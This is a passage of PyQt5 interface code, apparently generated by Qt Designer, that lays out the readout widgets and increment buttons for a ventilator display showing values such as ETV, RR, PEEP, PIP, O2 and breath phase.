sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ETV_value.sizePolicy().hasHeightForWidth())\r\n self.ETV_value.setSizePolicy(sizePolicy)\r\n self.ETV_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ETV_value.setFont(font)\r\n self.ETV_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ETV_value.setObjectName(\"ETV_value\")\r\n self.stat_col1_VL.addWidget(self.ETV_value)\r\n self.ETV_label = QtWidgets.QLabel(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ETV_label.sizePolicy().hasHeightForWidth())\r\n self.ETV_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ETV_label.setFont(font)\r\n self.ETV_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ETV_label.setObjectName(\"ETV_label\")\r\n self.stat_col1_VL.addWidget(self.ETV_label)\r\n self.stat_col1_sub = QtWidgets.QWidget(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col1_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col1_sub.setSizePolicy(sizePolicy)\r\n self.stat_col1_sub.setObjectName(\"stat_col1_sub\")\r\n self.stat_col1_sub_GL = QtWidgets.QGridLayout(self.stat_col1_sub)\r\n self.stat_col1_sub_GL.setObjectName(\"stat_col1_sub_GL\")\r\n self.RR_value = QtWidgets.QLabel(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_value.sizePolicy().hasHeightForWidth())\r\n self.RR_value.setSizePolicy(sizePolicy)\r\n self.RR_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.RR_value.setFont(font)\r\n self.RR_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.RR_value.setObjectName(\"RR_value\")\r\n self.stat_col1_sub_GL.addWidget(self.RR_value, 0, 1, 1, 1)\r\n self.RR_button_neg = QtWidgets.QPushButton(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_button_neg.sizePolicy().hasHeightForWidth())\r\n self.RR_button_neg.setSizePolicy(sizePolicy)\r\n self.RR_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.RR_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.RR_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.RR_button_neg.setObjectName(\"RR_button_neg\")\r\n self.RR_button_neg.clicked.connect(\r\n partial(self.RR_button_clicked, False))\r\n self.stat_col1_sub_GL.addWidget(self.RR_button_neg, 0, 0, 1, 1)\r\n self.RR_button_pos = QtWidgets.QPushButton(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_button_pos.sizePolicy().hasHeightForWidth())\r\n self.RR_button_pos.setSizePolicy(sizePolicy)\r\n self.RR_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.RR_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.RR_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.RR_button_pos.setObjectName(\"RR_button_pos\")\r\n self.RR_button_pos.clicked.connect(\r\n partial(self.RR_button_clicked, True))\r\n self.stat_col1_sub_GL.addWidget(self.RR_button_pos, 0, 2, 1, 1)\r\n self.RR_label = QtWidgets.QLabel(self.stat_col1_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.RR_label.sizePolicy().hasHeightForWidth())\r\n self.RR_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.RR_label.setFont(font)\r\n self.RR_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.RR_label.setObjectName(\"RR_label\")\r\n self.stat_col1_sub_GL.addWidget(self.RR_label, 1, 0, 1, 3)\r\n self.stat_col1_VL.addWidget(self.stat_col1_sub)\r\n self.stat_window_HL.addWidget(self.stat_col1)\r\n spacerItem3 = QtWidgets.QSpacerItem(\r\n 12, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem3)\r\n self.stat_col2 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col2.sizePolicy().hasHeightForWidth())\r\n self.stat_col2.setSizePolicy(sizePolicy)\r\n self.stat_col2.setObjectName(\"stat_col2\")\r\n self.stat_col2_VL = QtWidgets.QVBoxLayout(self.stat_col2)\r\n self.stat_col2_VL.setObjectName(\"stat_col2_VL\")\r\n self.PEEP_value = QtWidgets.QLabel(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PEEP_value.sizePolicy().hasHeightForWidth())\r\n self.PEEP_value.setSizePolicy(sizePolicy)\r\n self.PEEP_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PEEP_value.setFont(font)\r\n self.PEEP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PEEP_value.setObjectName(\"PEEP_value\")\r\n self.stat_col2_VL.addWidget(self.PEEP_value)\r\n self.PEEP_label = QtWidgets.QLabel(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PEEP_label.sizePolicy().hasHeightForWidth())\r\n self.PEEP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PEEP_label.setFont(font)\r\n self.PEEP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PEEP_label.setObjectName(\"PEEP_label\")\r\n self.stat_col2_VL.addWidget(self.PEEP_label)\r\n self.stat_col2_sub = QtWidgets.QWidget(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col2_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col2_sub.setSizePolicy(sizePolicy)\r\n self.stat_col2_sub.setObjectName(\"stat_col2_sub\")\r\n self.stat_col1_sub_GL_2 = QtWidgets.QGridLayout(self.stat_col2_sub)\r\n self.stat_col1_sub_GL_2.setObjectName(\"stat_col1_sub_GL_2\")\r\n self.sPEEP_value = QtWidgets.QLabel(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_value.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_value.setSizePolicy(sizePolicy)\r\n self.sPEEP_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPEEP_value.setFont(font)\r\n self.sPEEP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPEEP_value.setObjectName(\"sPEEP_value\")\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_value, 0, 1, 1, 1)\r\n self.sPEEP_button_neg = QtWidgets.QPushButton(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_button_neg.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_button_neg.setSizePolicy(sizePolicy)\r\n self.sPEEP_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPEEP_button_neg.setObjectName(\"sPEEP_button_neg\")\r\n self.sPEEP_button_neg.clicked.connect(\r\n partial(self.sPEEP_button_clicked, False))\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_button_neg, 0, 0, 1, 1)\r\n self.sPEEP_button_pos = QtWidgets.QPushButton(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_button_pos.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_button_pos.setSizePolicy(sizePolicy)\r\n self.sPEEP_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPEEP_button_pos.setObjectName(\"sPEEP_button_pos\")\r\n self.sPEEP_button_pos.clicked.connect(\r\n partial(self.sPEEP_button_clicked, True))\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_button_pos, 0, 2, 1, 1)\r\n self.sPEEP_label = QtWidgets.QLabel(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_label.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPEEP_label.setFont(font)\r\n self.sPEEP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPEEP_label.setObjectName(\"sPEEP_label\")\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_label, 1, 0, 1, 3)\r\n self.stat_col2_VL.addWidget(self.stat_col2_sub)\r\n self.stat_window_HL.addWidget(self.stat_col2)\r\n spacerItem4 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem4)\r\n self.stat_col3 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3.sizePolicy().hasHeightForWidth())\r\n self.stat_col3.setSizePolicy(sizePolicy)\r\n self.stat_col3.setObjectName(\"stat_col3\")\r\n self.stat_col3_VL = QtWidgets.QVBoxLayout(self.stat_col3)\r\n self.stat_col3_VL.setObjectName(\"stat_col3_VL\")\r\n self.PIP_value = QtWidgets.QLabel(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PIP_value.sizePolicy().hasHeightForWidth())\r\n self.PIP_value.setSizePolicy(sizePolicy)\r\n self.PIP_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PIP_value.setFont(font)\r\n self.PIP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PIP_value.setObjectName(\"PIP_value\")\r\n self.stat_col3_VL.addWidget(self.PIP_value)\r\n self.PIP_label = QtWidgets.QLabel(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PIP_label.sizePolicy().hasHeightForWidth())\r\n self.PIP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PIP_label.setFont(font)\r\n self.PIP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PIP_label.setObjectName(\"PIP_label\")\r\n self.stat_col3_VL.addWidget(self.PIP_label)\r\n self.stat_col3_sub = QtWidgets.QWidget(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col3_sub.setSizePolicy(sizePolicy)\r\n self.stat_col3_sub.setObjectName(\"stat_col3_sub\")\r\n self.stat_col1_sub_GL_3 = QtWidgets.QGridLayout(self.stat_col3_sub)\r\n self.stat_col1_sub_GL_3.setObjectName(\"stat_col1_sub_GL_3\")\r\n self.sPIP_value = QtWidgets.QLabel(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_value.sizePolicy().hasHeightForWidth())\r\n self.sPIP_value.setSizePolicy(sizePolicy)\r\n self.sPIP_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPIP_value.setFont(font)\r\n self.sPIP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPIP_value.setObjectName(\"sPIP_value\")\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_value, 0, 1, 1, 1)\r\n self.sPIP_button_neg = QtWidgets.QPushButton(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_button_neg.sizePolicy().hasHeightForWidth())\r\n self.sPIP_button_neg.setSizePolicy(sizePolicy)\r\n self.sPIP_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPIP_button_neg.setObjectName(\"sPIP_button_neg\")\r\n self.sPIP_button_neg.clicked.connect(\r\n partial(self.sPIP_button_clicked, False))\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_button_neg, 0, 0, 1, 1)\r\n self.sPIP_button_pos = QtWidgets.QPushButton(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_button_pos.sizePolicy().hasHeightForWidth())\r\n self.sPIP_button_pos.setSizePolicy(sizePolicy)\r\n self.sPIP_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPIP_button_pos.setObjectName(\"sPIP_button_pos\")\r\n self.sPIP_button_pos.clicked.connect(\r\n partial(self.sPIP_button_clicked, True))\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_button_pos, 0, 2, 1, 1)\r\n self.sPIP_label = QtWidgets.QLabel(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_label.sizePolicy().hasHeightForWidth())\r\n self.sPIP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPIP_label.setFont(font)\r\n self.sPIP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPIP_label.setObjectName(\"sPIP_label\")\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_label, 1, 0, 1, 3)\r\n self.stat_col3_VL.addWidget(self.stat_col3_sub)\r\n self.stat_window_HL.addWidget(self.stat_col3)\r\n spacerItem5 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem5)\r\n self.stat_col4 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col4.sizePolicy().hasHeightForWidth())\r\n self.stat_col4.setSizePolicy(sizePolicy)\r\n self.stat_col4.setObjectName(\"stat_col4\")\r\n self.stat_col2_VL_2 = QtWidgets.QVBoxLayout(self.stat_col4)\r\n self.stat_col2_VL_2.setObjectName(\"stat_col2_VL_2\")\r\n self.O2_value = QtWidgets.QLabel(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.O2_value.sizePolicy().hasHeightForWidth())\r\n self.O2_value.setSizePolicy(sizePolicy)\r\n self.O2_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.O2_value.setFont(font)\r\n self.O2_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.O2_value.setObjectName(\"O2_value\")\r\n self.stat_col2_VL_2.addWidget(self.O2_value)\r\n self.O2_label = QtWidgets.QLabel(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.O2_label.sizePolicy().hasHeightForWidth())\r\n self.O2_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.O2_label.setFont(font)\r\n self.O2_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.O2_label.setObjectName(\"O2_label\")\r\n self.stat_col2_VL_2.addWidget(self.O2_label)\r\n self.stat_col3_sub_3 = QtWidgets.QWidget(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3_sub_3.sizePolicy().hasHeightForWidth())\r\n self.stat_col3_sub_3.setSizePolicy(sizePolicy)\r\n self.stat_col3_sub_3.setObjectName(\"stat_col3_sub_3\")\r\n self.stat_col1_sub_GL_4 = QtWidgets.QGridLayout(self.stat_col3_sub_3)\r\n self.stat_col1_sub_GL_4.setObjectName(\"stat_col1_sub_GL_4\")\r\n self.PHASE_value = QtWidgets.QLabel(self.stat_col3_sub_3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PHASE_value.sizePolicy().hasHeightForWidth())\r\n self.PHASE_value.setSizePolicy(sizePolicy)\r\n self.PHASE_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PHASE_value.setFont(font)\r\n self.PHASE_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PHASE_value.setObjectName(\"PHASE_value\")\r\n self.stat_col1_sub_GL_4.addWidget(self.PHASE_value, 0, 1, 1, 1)\r\n self.PHASE_label = QtWidgets.QLabel(self.stat_col3_sub_3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PHASE_label.sizePolicy().hasHeightForWidth())\r\n self.PHASE_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PHASE_label.setFont(font)\r\n self.PHASE_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PHASE_label.setObjectName(\"PHASE_label\")\r\n self.stat_col1_sub_GL_4.addWidget(self.PHASE_label, 1, 0, 1, 3)\r\n self.stat_col2_VL_2.addWidget(self.stat_col3_sub_3)\r\n self.stat_window_HL.addWidget(self.stat_col4)\r\n self.stat_widget_HL.addWidget(self.stat_window)\r\n spacerItem6 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem6)\r\n self.time_widget = QtWidgets.QWidget(self.stat_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_widget.sizePolicy().hasHeightForWidth())\r\n self.time_widget.setSizePolicy(sizePolicy)\r\n self.time_widget.setMinimumSize(QtCore.QSize(320, 0))\r\n self.time_widget.setMaximumSize(QtCore.QSize(320, 16777215))\r\n self.time_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\\n\"\r\n \"\")\r\n self.time_widget.setObjectName(\"time_widget\")\r\n self.time_widget_VL = QtWidgets.QVBoxLayout(self.time_widget)\r\n self.time_widget_VL.setObjectName(\"time_widget_VL\")\r\n self.time_value = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_value.sizePolicy().hasHeightForWidth())\r\n self.time_value.setSizePolicy(sizePolicy)\r\n self.time_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(44)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.time_value.setFont(font)\r\n self.time_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.time_value.setObjectName(\"time_value\")\r\n self.time_widget_VL.addWidget(self.time_value)\r\n self.time_label = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_label.sizePolicy().hasHeightForWidth())\r\n self.time_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.time_label.setFont(font)\r\n self.time_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.time_label.setObjectName(\"time_label\")\r\n self.time_widget_VL.addWidget(self.time_label)\r\n self.vent_time_widget = QtWidgets.QWidget(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_widget.sizePolicy().hasHeightForWidth())\r\n self.vent_time_widget.setSizePolicy(sizePolicy)\r\n self.vent_time_widget.setMaximumSize(QtCore.QSize(16777215, 75))\r\n self.vent_time_widget.setObjectName(\"vent_time_widget\")\r\n self.vent_time_widget_HL = QtWidgets.QHBoxLayout(self.vent_time_widget)\r\n 